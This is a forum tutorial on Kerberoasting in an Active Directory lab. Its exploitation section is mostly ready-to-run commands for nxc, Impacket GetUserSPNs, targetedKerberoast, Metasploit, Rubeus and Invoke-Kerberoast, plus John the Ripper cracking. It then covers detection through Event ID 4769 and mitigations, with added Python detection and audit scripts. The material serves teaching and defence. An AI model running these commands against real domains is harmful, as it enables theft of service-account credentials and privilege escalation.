Article: Kerberoasting Attack in Active Directory

Posted by stihl (Moderator)
This article explores Kerberoasting, a stealthy attack in Active Directory that exploits Service Principal Names (SPNs) to extract and crack TGS ticket hashes, revealing service account passwords. Unlike AS-REP Roasting, it abuses legitimate Kerberos requests. The post details lab setup, exploitation using Impacket, Rubeus, and NXC, and maps the attack to MITRE ATT&CK T1558.003. It also covers detection (Event ID 4769), AES enforcement, and mitigation strategies to defend against this threat.

Table of Contents

  • Kerberoasting Walkthrough
  • Prerequisites
  • Lab Setup
  • Method for Exploitation – Kerberoasting Attack (T1558.003)
      • Nxc
      • Impacket-GetUserSPNs
      • targetedKerberoast
      • Metasploit
      • Rubeus
      • Windows PowerShell – Kerberoast
  • Detection & Mitigation

Kerberoasting Walkthrough

Step 1: Attacker Gains Access to the Domain

The attacker first logs into the domain using a valid low-privileged user account. No special permissions or admin access is needed—just any domain user account will do.

Step 2: Enumerate SPNs (Service Principal Names)

The attacker scans the domain to find service accounts that have SPNs associated with them.

These SPNs represent services running on the network—like SQL, HTTP, etc.—and are tied to domain accounts.

Step 3: Request TGS for the SPN

Once the attacker finds SPNs, they request a Ticket Granting Service (TGS) ticket from the Domain Controller (KDC) for those services.

These tickets are encrypted using the NTLM hash of the service account’s password.

The attacker does not need the password to request the ticket—just the SPN.

Step 4: Extract the TGS Ticket

The attacker extracts the TGS ticket from memory or directly using tools.

Step 5: Crack the TGS Ticket Offline

The encrypted TGS ticket is then cracked offline using tools such as hashcat or John the Ripper.

The attacker runs a brute-force or dictionary attack to recover the plaintext password of the service account.

Since the ticket is encrypted with the account’s hash, cracking the ticket = getting the password.

Step 6: Use the Cracked Password

If successful, the attacker now has credentials of the service account.

Many service accounts have high privileges (like local admin or even domain admin), or can be used to move laterally, access databases, or escalate privileges.

Prerequisites

  • Windows Server 2019 as Active Directory
  • Kali Linux
  • Tools: Impacket, Metasploit, nxc, targetedKerberoast, Rubeus, PowerShell
  • Windows 10/11 – As Client

Lab Setup

In this lab setup, we will assign an SPN to a service account, setting the stage for a kerberoasting attack simulation.

Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

  • Install Windows Server (2016 or 2019 recommended).
  • Promote it to a Domain Controller by adding the Active Directory Domain Services role.
  • Set up the domain (e.g., ignite.local).

Create a Service Account with SPN:

On the Domain Controller (DC), use setspn to assign an SPN to the user raj.

Code:
setspn -a hackingarticles/dc.ignite.local ignite.local\raj

  • -a adds an SPN to the user.
  • hackingarticles/dc.ignite.local is the SPN.
  • ignite.local\raj is the service account.


Method for Exploitation – Kerberoasting Attack (T1558.003)

Attackers (in this case, the user aarti) can exploit service accounts with SPNs by requesting Kerberos service tickets (TGS) that are encrypted with the account's NTLM hash. They can then crack these tickets offline to recover plaintext credentials.

NXC

NXC (formerly CrackMapExec) can perform Kerberoasting efficiently.

Code:
nxc ldap 192.168.1.53 -u aarti -p Password@1 --kerberoasting hash.txt



John the Ripper, combined with a dictionary such as rockyou.txt, can then be used to brute-force a weak service account password from the dumped hash.

Code:
john -w=/usr/share/wordlists/rockyou.txt hash.txt



Impacket-GetUserSPNs

Use Impacket's built-in script "GetUserSPNs.py": it discovers SPNs, requests the TGS tickets and dumps the service hashes. This can be done with the following command.

Code:
impacket-GetUserSPNs -request -dc-ip 192.168.1.53 ignite.local/aarti:Password@1

It will then dump the service hash, which you can brute-force with a dictionary to recover the service password.



targetedKerberoast

targetedKerberoast is a Python script that prints "kerberoast" hashes for user accounts that have an SPN set.

Clone the repository and install its Python dependencies:

Code:
git clone https://github.com/ShutdownRepo/targetedKerberoast.git
cd targetedKerberoast
pip3 install -r requirements.txt



Run the attack:

Code:
./targetedKerberoast.py --dc-ip '192.168.1.53' -v -d 'ignite.local' -u 'aarti' -p 'Password@1'



Metasploit

The easiest way to enumerate Kerberoastable accounts is the auxiliary/gather/get_user_spns module, which internally leverages Impacket. The module automatically queries LDAP for Kerberoastable SPNs and requests a Kerberos service ticket for each; a ticket encrypted with a weak password can then be brute-forced:

Code:
use auxiliary/gather/get_user_spns
set rhosts 192.168.1.53
set domain ignite.local
set user aarti
set pass Password@1
run



Windows

Rubeus

Rubeus.exe comes with a kerberoast module that discovers SPNs, extracts the TGS tickets and dumps the service hashes; run it with the following command.

Code:
./Rubeus.exe kerberoast /outfile:hash.txt



Windows PowerShell – Kerberoast

You can download Invoke-Kerberoast.ps1, a PowerShell script that works like the module above: it discovers the SPNs, extracts the TGS tickets and dumps the service hashes. Run it with the following commands.

Code:
powershell -ep bypass
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast



Detection & Mitigation

Detection

Detecting Kerberoasting is crucial because attackers silently request service tickets, which they can later crack offline.

Key Windows Event ID: 4769

What to Look for in Event ID 4769:

  • Ticket Encryption Type: Often 0x17 (RC4) — the easiest to crack.
  • Account Name: Look for unusual service account names or high-value users.
  • Service Name (SPN): Identify rare or high-privilege SPNs that shouldn't be accessed frequently.
  • Client Address: If TGS requests come from non-privileged or unusual machines/users, it may be suspicious.

These indicators may suggest Kerberoasting activity, especially when a low-privileged account is seen requesting tickets for service accounts.
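
As an added example that is not part of the original article, the checks listed above applied to a handful of constructed Event ID 4769 records (hypothetical data; the dictionary keys stand in for the event's TargetUserName, ServiceName, TicketEncryptionType and IpAddress fields, and the five-minute / three-service burst threshold is an assumed tuning value):

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # Ticket Encryption Type value for RC4-HMAC in Event ID 4769

# Constructed sample 4769 records (hypothetical, not real log data). Field names
# mirror the event's TargetUserName, ServiceName, TicketEncryptionType and IpAddress.
SAMPLE_EVENTS = [
    {"time": "2025-01-10T09:00:01", "account": "aarti@IGNITE.LOCAL", "service": "raj",    "etype": 0x17, "client": "192.168.1.10"},
    {"time": "2025-01-10T09:00:02", "account": "aarti@IGNITE.LOCAL", "service": "sqlsvc", "etype": 0x17, "client": "192.168.1.10"},
    {"time": "2025-01-10T09:00:03", "account": "aarti@IGNITE.LOCAL", "service": "websvc", "etype": 0x17, "client": "192.168.1.10"},
    {"time": "2025-01-10T09:00:04", "account": "aarti@IGNITE.LOCAL", "service": "DC$",    "etype": 0x12, "client": "192.168.1.10"},
    {"time": "2025-01-10T09:05:00", "account": "bob@IGNITE.LOCAL",   "service": "DC$",    "etype": 0x12, "client": "192.168.1.20"},
    {"time": "2025-01-10T09:30:00", "account": "bob@IGNITE.LOCAL",   "service": "raj",    "etype": 0x12, "client": "192.168.1.20"},
    {"time": "2025-01-10T09:31:00", "account": "bob@IGNITE.LOCAL",   "service": "krbtgt", "etype": 0x12, "client": "192.168.1.20"},
]

def is_user_service(service):
    """Computer accounts (trailing $) and krbtgt are routine TGS targets; only
    user-based service accounts with SPNs are what Kerberoasting goes after."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def find_kerberoast_candidates(events, window=timedelta(minutes=5), min_services=3):
    """Return a list of (kind, requesting account, detail, client IP) alerts."""
    alerts = []
    # Rule 1: an RC4 service ticket for a user-based SPN is the classic signal,
    # and once AES is enforced RC4 should not appear for these services at all.
    for e in events:
        if e["etype"] == RC4_HMAC and is_user_service(e["service"]):
            alerts.append(("rc4_user_spn", e["account"], e["service"], e["client"]))
    # Rule 2: one account requesting tickets for many distinct user services in a
    # short window looks like mass SPN harvesting regardless of encryption type.
    by_account = defaultdict(list)
    for e in sorted(events, key=lambda x: x["time"]):
        if is_user_service(e["service"]):
            by_account[e["account"]].append(e)
    for account, evs in by_account.items():
        for i, first in enumerate(evs):
            t0 = datetime.fromisoformat(first["time"])
            in_window = [ev for ev in evs[i:] if datetime.fromisoformat(ev["time"]) - t0 <= window]
            services = {ev["service"] for ev in in_window}
            if len(services) >= min_services:
                alerts.append(("spn_burst", account, len(services), first["client"]))
                break  # one burst alert per account is enough
    return alerts

if __name__ == "__main__":
    for alert in find_kerberoast_candidates(SAMPLE_EVENTS):
        print(alert)
```

Computer-account services and krbtgt are excluded because ordinary logons request those tickets constantly; the window and threshold should be tuned to the environment's normal TGS volume.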

Mitigation

Protecting your Active Directory environment from Kerberoasting involves improving password hygiene, SPN configuration, and monitoring.

  • Use Strong, Complex Passwords: Ensure service accounts (especially those with SPNs) use long, random, and unique passwords. Avoid reusing passwords or using dictionary words.
  • Rotate Passwords Regularly: Implement scheduled password changes for service accounts — especially those tied to SPNs.
  • Use Managed Service Accounts (gMSA): These accounts automatically handle complex password management and rotation, significantly reducing risk.
  • Avoid Using Highly Privileged Accounts for Services: Don’t assign SPNs to Domain Admins or other privileged accounts. Use separate, least-privilege accounts for services.
  • Disable RC4 Encryption: Enforce stronger encryption types (AES128: 0x11, AES256: 0x12) via Group Policy.
  • Monitor Event ID 4769 Regularly: Use SIEM tools or scripts to alert on unusual TGS requests.
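
To turn the list above into a check, here is an added audit example (not from the original article) that scores constructed account records against it: an SPN on a non-gMSA account that still permits RC4, carries adminCount=1 or has a stale password is reported as a gap. The sample accounts, the audit date and the 90-day age limit are assumptions; the msDS-SupportedEncryptionTypes values are the attribute's documented bit flags.

```python
from datetime import datetime, timedelta

# Bit flags of the msDS-SupportedEncryptionTypes attribute
DES_CRC, DES_MD5, RC4_HMAC, AES128_CTS, AES256_CTS = 0x1, 0x2, 0x4, 0x8, 0x10
GMSA_CLASS = "msDS-GroupManagedServiceAccount"
AUDIT_TIME = datetime(2025, 1, 10)  # assumed "now" for the sample data

# Constructed sample account records (hypothetical, not exported from a real domain).
# Keys mirror the AD attributes a defender would pull for this audit.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "raj", "servicePrincipalName": ["hackingarticles/dc.ignite.local"],
     "adminCount": 1, "pwdLastSet": "2023-01-15T10:00:00", "objectClass": ["user"]},
    {"sAMAccountName": "sqlsvc", "servicePrincipalName": ["MSSQLSvc/db.ignite.local:1433"],
     "msDS-SupportedEncryptionTypes": AES128_CTS | AES256_CTS,
     "adminCount": 0, "pwdLastSet": "2025-01-01T08:00:00", "objectClass": ["user"]},
    {"sAMAccountName": "gmsa_web$", "servicePrincipalName": ["HTTP/web.ignite.local"],
     "msDS-SupportedEncryptionTypes": AES256_CTS, "adminCount": 0,
     "pwdLastSet": "2025-01-05T00:00:00", "objectClass": ["user", GMSA_CLASS]},
    {"sAMAccountName": "alice", "servicePrincipalName": [],
     "adminCount": 0, "pwdLastSet": "2022-06-01T00:00:00", "objectClass": ["user"]},
]

def audit_spn_account(acct, now=AUDIT_TIME, max_pw_age_days=90):
    """Return the mitigation gaps for one account; an empty list means no Kerberoasting exposure."""
    findings = []
    if not acct.get("servicePrincipalName"):
        return findings  # no SPN, so no TGS can be requested for it: not Kerberoastable
    if GMSA_CLASS in acct.get("objectClass", []):
        return findings  # gMSA: long random password that AD rotates automatically
    etypes = acct.get("msDS-SupportedEncryptionTypes", 0)
    # 0 / absent means the DC default applies, which typically still permits RC4
    if etypes == 0 or etypes & RC4_HMAC:
        findings.append("rc4_allowed")
    if etypes & (DES_CRC | DES_MD5):
        findings.append("des_allowed")
    if acct.get("adminCount") == 1:
        findings.append("privileged_account_with_spn")
    if now - datetime.fromisoformat(acct["pwdLastSet"]) > timedelta(days=max_pw_age_days):
        findings.append("stale_password")
    return findings

def audit_domain(accounts, now=AUDIT_TIME):
    """Map each account name to its findings, keeping only accounts with at least one gap."""
    return {a["sAMAccountName"]: f for a in accounts if (f := audit_spn_account(a, now))}

if __name__ == "__main__":
    for name, gaps in audit_domain(SAMPLE_ACCOUNTS).items():
        print(name, gaps)
```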
